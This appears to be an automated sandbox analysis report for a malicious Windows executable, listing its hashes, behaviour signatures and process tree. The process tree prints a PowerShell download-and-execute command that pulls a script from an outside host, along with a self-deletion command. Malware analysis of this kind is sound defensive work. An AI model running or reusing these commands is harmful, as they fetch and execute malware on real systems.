Overview

overview

10

Static

static

3

02705399.exe

windows7-x64

10

02705399.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    27s
  • max time network
    29s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    27/05/2023, 08:57

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    02705399.exe

  • Size

    246KB

  • MD5

    f3e968ba5b17cca9be62e5ca9c9b06f0

  • SHA1

    65fe252a722716c7c61563c3ca6101f50a21bda8

  • SHA256

    869abff3b6b8d0d0e854a0b7708ece00ab0e578902c694b816a35f102aa9ea5b

  • SHA512

    a574ce1185c6683b2fdfe4b22f910cdd47ad673095b5906cb3d18d967de3e32f5666a392005b7fd99f587d974ce40f9dcceea62324680a3d2ceb1e382f8f5d81

  • SSDEEP

    3072:PRYHxx1X/nD7OWQHBJB79Vd1i+qfsidTij98UwXVoM9EoJfsy9Om4QNYYTAFRNln:PuM9GFoMmEXOm4KMvAOeHz5+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://slpbridge.com/storage/images/debug2.ps1

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\02705399.exe
    "C:\Users\Admin\AppData\Local\Temp\02705399.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1472
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://slpbridge.com/storage/images/debug2.ps1')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1360
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command IEX(New-Object Net.Webclient).DownloadString('https://slpbridge.com/storage/images/debug2.ps1')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1264
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\02705399.exe" >> NUL
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1572

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
          Filesize

          62KB

          MD5

          3ac860860707baaf32469fa7cc7c0192

          SHA1

          c33c2acdaba0e6fa41fd2f00f186804722477639

          SHA256

          d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

          SHA512

          d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Tar2D5F.tmp
          Filesize

          164KB

          MD5

          4ff65ad929cd9a367680e0e5b1c08166

          SHA1

          c0af0d4396bd1f15c45f39d3b849ba444233b3a2

          SHA256

          c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

          SHA512

          f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

          Download Submit

        • memory/1264-58-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/1264-59-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1264-60-0x0000000002620000-0x00000000026A0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1264-61-0x0000000002620000-0x00000000026A0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1264-62-0x0000000002620000-0x00000000026A0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1264-63-0x0000000002620000-0x00000000026A0000-memory.dmp

          Filesize

          512KB

          Download